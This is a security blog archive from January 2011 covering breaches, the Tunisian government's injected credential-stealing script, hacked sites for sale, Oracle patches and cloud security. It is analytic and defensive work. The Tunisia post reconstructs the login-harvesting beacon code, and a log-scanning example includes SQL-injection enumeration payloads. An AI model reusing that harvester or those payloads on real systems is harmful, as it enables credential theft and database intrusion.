9 posts from January 2011
January 31, 2011
 Plenty of Fish? Plenty of Clear Text Passwords?

In a story published more than a year ago about the rockyou.com hack, the hacker said that a large portion of websites store passwords in clear text.

In just the past few hours, the dating website plentyoffish.com appears to have suffered a major breach, with up to 28M records reportedly lost.  The story above provides an interesting foreshadowing of things to come.  One of the comments made (again, a year ago!) in response to the rockyou.com breach noted that plentyoffish.com also stored passwords in clear text:

[Screenshot: the comment on the rockyou.com story stating that plentyoffish.com stores passwords in clear text]

 

January 28, 2011
 WikiLeaks Competitor Comes Out of Stealth Mode

Today's Washington Post reports on a new file-sharing, whistleblower site called OpenLeaks.  The story was also highlighted on Drudge.

The homepage has an interesting video that is "must-see TV".  Its point is to show how OpenLeaks will try to differentiate itself from WikiLeaks with better, faster technology for sharing sensitive files.  Few technical details on how it will work are provided, but they explain that OpenLeaks will automate the process to make it easier for whistleblowers to share documents; they say WikiLeaks is too manual and therefore slows file sharing down.  OpenLeaks, on the other hand, will have a "digital drop box" for journalists, NGOs, human rights groups, etc. to share whatever documents they want, whenever they want.  The service will go into beta sometime in the next few months.

I guess this would be called WaaS (Whistleblowing-as-a-Service).  The real question we IT geeks are asking is this:  when will Gartner do a Magic Quadrant?

 

January 27, 2011
 Interview with a Hacker

Our post on hacked .edu and .mil websites attracted a lot of attention.  Tony Bradley of PC World had an excellent, Kafkaesque take:

Have you ever walked into a kitchen at night and turned on the lights just in time to see a few cockroaches scurry off—knowing that the couple that got caught in the light are an indication that there are probably hundreds of them safely hidden in the walls and cabinets somewhere?

He continues:

Just like the cockroaches, for every site exposed on the hacker underground, there are most likely many more compromised sites that remain hidden. And, like the cockroaches, it is much more important to consider the big picture of how to improve security to protect Web sites and databases and guard against the larger problem than it is to focus on the handful that got caught in the light.

Now, the hacker responsible seems to have granted an interview—and you can read the full text here.

What does the hacker have to say?  He confirms Mr. Bradley’s “Cockroach Theory.”  Here's the highlight (sic):

QUESTION: Do you have any ethical problems with exploiting and then profiting from poor security on these sites?

ANSWER:  No at all. Each vulnerable site i face. I directly email the Web admin. If I see no reply I publish it.

QUESTION: Do you think the web site/application security is getting any better over the last 5 years? 3 years?

ANSWER:  Am into security since 1996. Simply I SEE NO CHANGES and it's become worst than ever.

 

January 25, 2011
 Hacking Facebook, Gmail and Yahoo! in Tunisia

It’s only January and we’ve just witnessed a first:  cyber insecurity bringing down a government.  The government of Tunisia, a WikiLeaks target, has been under severe scrutiny for corruption ever since WikiLeaks exposed some dodgy practices.

The Tech Herald highlighted how the Tunisian government conducted a “cyber retaliation” in which usernames and passwords were harvested, presumably by the government, to monitor and/or manipulate citizens' communications.  Facebook, Gmail and Yahoo! were affected.

Imperva’s Application Defense Center (ADC) obtained the pages allegedly injected by the Tunisian government:

Gmail - http://pastebin.com/G6iEjENK
Yahoo! - http://pastebin.com/M5CbYTWj
Facebook - http://pastebin.com/1JsrcZBf

Sorry, but this entry is about to get quite geeky.   For those of you who enjoy the anatomy of a hack, it is quite interesting.  If you’re not a geek: basically, these are pictures of a hacker’s hand in the cookie jar.


The method is the same on all three pages: a credential-stealing JavaScript function, hAAAQ3d(), is added to the normal form post.

Compare the original Gmail form submission:

[Screenshot: the original Gmail form submission]

With the injected one (note the highlight):

[Screenshot: the injected Gmail form submission, with the added hAAAQ3d() call highlighted]

Here's the actual hAAAQ3d script:

[Screenshot: the hAAAQ3d script]

 
The hAAAQ3d script grabs the username and password from the login form:

  • The username is stored in the us3r (= user) variable:  var us3r = frm.Email.value;
  • The password is stored in the pa55 (= pass) variable:  var pa55 = frm.Passwd.value;

The script then scrambles the credentials with the h6h function and sends them as query parameters to the nonexistent URL http://www.google.com/wo0dh3ad (= woodhead):

var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);

Since the Tunisian government controls the country's internet traffic, it can log every request to this URL and so obtain the credentials with ease.  The request does not need to succeed: whatever Google answers, the scrambled username and password have already crossed the wire in the query string.
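The following is an added illustration of the pattern just described, not the captured hAAAQ3d script: the post does not reproduce the bodies of h6h or r5t, so both are stand-ins (assumptions) chosen only to show that the "scrambling" is a reversible encoding, not protection. The form object, e-mail address and password are constructed for the example. It builds the beacon URL exactly as the post describes (Email and Passwd fields, q/u/p parameters, the /wo0dh3ad path) and then shows what an on-path observer recovers from the request line alone.

```javascript
// Added example: the credential-harvesting beacon, and its recovery by whoever
// sees the HTTP request. h6h and r5t are stand-ins; their real bodies are not on the page.

// Stand-in for r5t(n): a short filler token (deterministic so the example is repeatable).
function r5t(n) {
  const alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789';
  let s = '';
  for (let i = 0; i < n; i++) s += alphabet[(i * 7 + 3) % alphabet.length];
  return s;
}

// Stand-in for h6h(s): a trivially reversible obfuscation (reverse, then hex).
function h6h(s) {
  return Buffer.from(s.split('').reverse().join(''), 'utf8').toString('hex');
}
function unH6h(s) {
  return Buffer.from(s, 'hex').toString('utf8').split('').reverse().join('');
}

// The harvester as the post describes it: read the two login fields, scramble them,
// and build a GET to a non-existent path under the real host's name.
function buildBeaconUrl(frm) {
  const us3r = frm.Email.value;
  const pa55 = frm.Passwd.value;
  return 'http://www.google.com/wo0dh3ad?q=' + r5t(5) + '&u=' + h6h(us3r) + '&p=' + h6h(pa55);
}

// What an on-path party recovers from the request line. The response (a 404 from
// Google) is irrelevant; the secret travelled in the request.
function recoverFromRequestLine(line) {
  const m = /^GET (\S+) HTTP\/1\.[01]$/.exec(line);
  if (!m) return null;
  const u = new URL(m[1]);
  if (u.pathname !== '/wo0dh3ad') return null;
  const enc = u.searchParams.get('u');
  const pw = u.searchParams.get('p');
  if (!enc || !pw) return null;
  return { user: unH6h(enc), pass: unH6h(pw) };
}

// Constructed stand-in for the DOM form the injected script reads.
const frm = { Email: { value: 'citizen@example.com' }, Passwd: { value: 'jasmine2011' } };
const beacon = buildBeaconUrl(frm);
const seenOnTheWire = 'GET ' + beacon + ' HTTP/1.1';
console.log(beacon);
console.log(recoverFromRequestLine(seenOnTheWire));
```

Two things worth noticing. The obfuscation is pointless as a defence for anyone but the attacker: the party that served the injected script is the party that reads the log, so h6h only needs to be reversible by them. And the beacon is an ordinary GET to the legitimate host, so a network-level watcher that only checks destination hosts sees nothing unusual; an in-path injector of this kind is kept out by serving the login page and its form action over TLS end to end.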

 

 

 

January 21, 2011
 Major websites (gov,mil,edu) are Hacked and Up for Sale

The list includes (with the hacker's original typos):

[Screenshot: the hacker's list of sites for sale]

The "traffic" column probably stands for the number of records in the database tables.  The "goods" are probably whatever is needed to exercise the stated "Level of Control"; for "full site admin" that would be the credentials and the URL of the site's administrator interface.

The hacker is also selling personally identifiable information (PII) from the hacked sites, at $20 per 1K records:

[Screenshot: the hacker's price list]

For example, here they offer a list of UConn staff:

[Screenshot: the UConn staff listing for sale]

In the screenshot below, the hacker tries to show proof of access to the administrator interface of a major university:

[Screenshot: the university's administrator interface]
 

The victims' vulnerabilities were probably found with an automated SQL injection scanner and exploited just as automatically; the hacker published his methods in a post on a hacker forum.  See the screenshot and explanation below:

[Screenshot: the hacker's forum post showing the IRC session]

In the screenshot we can see an IRC "chat" between the SQLi "master", @evil, which issues the scanning commands, and the exploiting bot "x0wner", which carries them out.  In this specific case @evil commands x0wner to obtain the database table names ("!tbls") from a vulnerable link ("www.site.gr/athlete.php?id=..."), and x0wner reports its findings: the tables "activities", "admin", …
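The "!tbls" step leaves a recognisable trail in the victim's own logs. As an added example (not from the post or the hacker's toolkit), here is a small detector that runs over web-server access-log lines and flags the probes an automated SQLi scanner and exploiter send when it counts columns and enumerates table names. The log lines are constructed for the example; the `athlete.php?id=` parameter mirrors the vulnerable link in the screenshot, and the signature list is an assumption, not a complete rule set.

```javascript
// Added example: flag automated SQL-injection enumeration probes in access-log lines.

const SIGNATURES = [
  { name: 'union-based column probe', re: /\bunion\b[\s/*]+(all\s+)?select\b/i },
  { name: 'schema enumeration', re: /information_schema\.(tables|columns)/i },
  { name: 'table-name aggregation', re: /group_concat\s*\(\s*table_name/i },
  { name: 'boolean/blind probe', re: /(?:'|\d)\s*(?:and|or)\s+\d+\s*=\s*\d+/i },
  { name: 'column-count probe', re: /\border\s+by\s+\d+/i },
];

// Apache/nginx "combined" style line: client, method, request target, status.
const LINE_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /;

function normalize(target) {
  // '+' is a space in query strings; decode twice because scanners double-encode.
  let s = target.replace(/\+/g, ' ');
  for (let i = 0; i < 2; i++) {
    try { s = decodeURIComponent(s); } catch (e) { break; }
  }
  // Strip inline comments used to split keywords, e.g. UNION/**/SELECT.
  return s.replace(/\/\*.*?\*\//g, ' ');
}

function classify(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, client, method, target, status] = m;
  const decoded = normalize(target);
  const hits = SIGNATURES.filter(s => s.re.test(decoded)).map(s => s.name);
  return hits.length ? { client, method, status, target: decoded, hits } : null;
}

function scan(lines) {
  return lines.map(classify).filter(Boolean);
}

// Constructed sample log (not real traffic). The probes are interleaved with
// ordinary requests to the same parameter.
const SAMPLE_LOG = [
  '203.0.113.7 - - [21/Jan/2011:10:00:01 +0000] "GET /athlete.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [21/Jan/2011:10:00:02 +0000] "GET /athlete.php?id=12%27+AND+1%3D1--+- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [21/Jan/2011:10:00:03 +0000] "GET /athlete.php?id=12+ORDER+BY+5--+- HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [21/Jan/2011:10:00:04 +0000] "GET /athlete.php?id=-12+UNION/**/SELECT+1,group_concat(table_name),3+FROM+information_schema.tables-- HTTP/1.1" 200 6044 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [21/Jan/2011:10:00:05 +0000] "GET /athlete.php?id=13 HTTP/1.1" 200 5098 "-" "Mozilla/5.0"',
];

for (const hit of scan(SAMPLE_LOG)) console.log(hit);
```

Read the flagged sequence from one client in order and the bot's workflow is visible: a boolean probe to confirm injection, ORDER BY to count columns, then a UNION with group_concat over information_schema to pull the table list. Signature matching of this kind is noisy on its own (a legitimate parameter containing "order by" would trip it), so in practice the hits are worth correlating per client and per parameter rather than alerting on single lines. None of this is a substitute for the actual fix, which is parameterised queries on the id parameter.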

 

 

January 19, 2011
 Perspective on the latest Oracle patches

Oracle patching needs fixing. In the past, Oracle had a solid process for receiving reports, validating them and scheduling fixes, and a lot of momentum around fixing database vulnerabilities. However, the quarterly patch cycle has slowed down on database vulnerabilities since the acquisition and incorporation of so many companies and products over the past year. It's hard to believe there is only one database fix quarter-to-quarter when there must be dozens or even hundreds of vulnerabilities.

In the past, when Oracle had far fewer products, it would patch 100 database vulnerabilities at a time. One would assume that more products require more fixes, yet we are seeing smaller patches with fewer fixes for more products.

Also troubling is that Oracle gives no clear indication of what the vulnerabilities involve, citing concerns that hackers would turn the details into exploits. Unfortunately, hackers will reverse engineer the patch anyway to find the vulnerabilities, leaving Oracle customers as the only party without insight into what is happening.

Without such insight, Oracle customers cannot develop a work-around for their production applications, and I find it hard to believe a company would patch critical applications without months of testing. This lack of transparency is outrageous. Vendors expect researchers to share details with them responsibly, yet they fail to do the same with security vendors and their own customers.

Regarding the patch released on January 18th, four vulnerabilities are rated 10 for severity. We are seeing fixes for remote code execution without authentication, which is very severe. For example, the Audit Vault vulnerability allows an attacker to bypass authentication and act as a remote administrator, executing any command on a server where the Audit Vault agent is installed.

Within the database products, only six vulnerabilities are fixed. Two are remotely exploitable without authentication, yet the highest severity is only 7.5. It is also interesting that only two vulnerabilities were fixed in the E-Business Suite, while PeopleSoft and JD Edwards have 12 fixes. The primary vulnerability class across the patch seems to be SQL injection in various modules.

Exploits may emerge over the next few days, but we’ll have to wait and see. Unfortunately, it will likely take much longer for companies to test and implement this patch into their production environment.

--Posted by Amichai Shulman, Imperva CTO

 

 

January 15, 2011
 Must read Stuxnet article

http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

Most interesting part:

The worm itself now appears to have included two major components. One was designed to send Iran’s nuclear centrifuges spinning wildly out of control. Another seems right out of the movies: The computer program also secretly recorded what normal operations at the nuclear plant looked like, then played those readings back to plant operators, like a pre-recorded security tape in a bank heist, so that it would appear that everything was operating normally while the centrifuges were actually tearing themselves apart.

The attacks were not fully successful: Some parts of Iran’s operations ground to a halt, while others survived, according to the reports of international nuclear inspectors. Nor is it clear the attacks are over: Some experts who have examined the code believe it contains the seeds for yet more versions and assaults.

 

 

January 13, 2011
 SAP Buys SECUDE

Security continues its fast march towards becoming a business process.  SAP is the mother of business process software companies.

 "SAP is acquiring software and related assets from its partner SECUDE in order to provide improved security for its customer base, the company said Wednesday. The deal is expected to be completed by Feb. 1. Terms were not disclosed."

Who's next?


 

January 04, 2011
 Cloud Security

Before we talk about cloud security, it's important to define the different cloud offerings enterprises hope to protect. The cloud models are:

  • Infrastructure as a Service (IaaS) – IaaS providers offer flexible, state-of-the-art cloud data centers. By pooling together a large number of tenants and leveraging virtualization and large-scale management capabilities, IaaS providers deliver a sophisticated and elastic data center platform. Some IaaS providers offer Web attack protection and regulatory compliance readiness to their customers as incremental business.
  • Platform as a Service (PaaS) – PaaS providers offer application development and delivery platforms that accelerate time-to-market for new applications and services. PaaS providers should provide their customers with Web attack protection as part of the underlying application architecture.
  • Software as a Service (SaaS) – SaaS providers deliver cloud-based business applications for sales, finance, HR and other functional areas. These applications host large amounts of sensitive data from many organizations. As organizations adopt cloud applications to streamline their IT operations, SaaS providers are expected to ensure data security and address regulatory compliance, just as would be required for on-premise data.

Security Concerns With Cloud Computing
Migration to the cloud is on every organization’s objectives list. Yet a Forrester 2009 Q4 survey of 165 companies across 39 countries shows the hesitation that remains: when asked “what are your top SaaS adoption inhibitors”, the most frequently cited concern was security, at 48 percent.  This should not surprise anyone since, after all, cloud services have fallen victim to security vulnerabilities. Just looking at the “big” players we can quickly count some of the mishaps: Gmail email and contact lists, as well as Yahoo mail, were prone to XSS and JavaScript hijacking; Amazon EC2 was affected by an Amazon Web Services request-signature vulnerability; and Twitter fell prey to an attack in which a hacker obtained and distributed more than 300 confidential documents about Twitter’s business affairs that were stored on Google Apps.

Threat in the Cloud
We outlined concerns with cloud computing in detail in a previous blog post.  Many of the security threats are the same as for non-cloud deployments: hackers and insiders want data, and we live in a data-driven world.  But there are differences:

  • Maintaining bulletproof partitions between datasets of different customers.
  • Providing different levels of data security to applications sharing the same logical or physical platforms.
  • Protecting customer data from the prying eyes of cloud administrators.
  • Providing solutions that operate over a specialized infrastructure (VM, Amazon AMI).
  • Managing application and data security for a large number of applications inside the cloud. 
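The first two differences are the ones that most often fail in code rather than in infrastructure. As an added example (not from the post, and not any vendor's implementation), here is a minimal multi-tenant data store in Node.js in which every operation is scoped by the tenant established at authentication time, never by a tenant identifier the caller supplies. The class and field names, tenants and records are assumptions constructed for the example.

```javascript
// Added example: tenant partitioning enforced in the data-access layer.
// The store exposes no unscoped read or write; the tenant comes from the
// authenticated context, not from request data the caller controls.

class TenantStore {
  constructor() { this.rows = []; }

  // ctx is what the platform established at authentication (e.g. from a token).
  scoped(ctx) {
    if (!ctx || typeof ctx.tenantId !== 'string' || !ctx.tenantId) {
      throw new Error('no tenant in context');
    }
    const tenantId = ctx.tenantId;
    const rows = this.rows;
    return {
      insert(record) {
        // Any tenantId the caller put in the record is overwritten by the context.
        const stored = { ...record, tenantId, id: rows.length + 1 };
        rows.push(stored);
        return stored.id;
      },
      get(id) {
        const r = rows.find(x => x.id === id);
        // "Not found" and "belongs to another tenant" are deliberately indistinguishable.
        return r && r.tenantId === tenantId ? r : null;
      },
      list() { return rows.filter(x => x.tenantId === tenantId); },
    };
  }
}

// Demo: two tenants sharing one logical store, as in a SaaS application.
const store = new TenantStore();
const acme = store.scoped({ tenantId: 'acme', user: 'alice' });
const globex = store.scoped({ tenantId: 'globex', user: 'bob' });

// A tampering attempt: the record claims to belong to globex; the context wins.
const acmeId = acme.insert({ customer: 'Acme client 1', tenantId: 'globex' });
globex.insert({ customer: 'Globex client 1' });

console.log(acme.list().length, globex.list().length);  // one record each
console.log(globex.get(acmeId));                         // null: cross-tenant read denied
```

The design choice is that the store has no "global" API at all, so a bug in request handling cannot reach another tenant's rows by passing the wrong id; the same rule applies to whatever backs the store in production, where the tenant column belongs in every query's WHERE clause (or in row-level security), not in application code that remembers to add it. Note that this partitions tenants from each other but does nothing about the third concern, a cloud administrator who can read `store.rows` directly; that calls for encryption under keys the provider's operators do not hold.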

What should enterprises ask themselves when choosing a cloud provider?  More on that later.

 

 

 

 
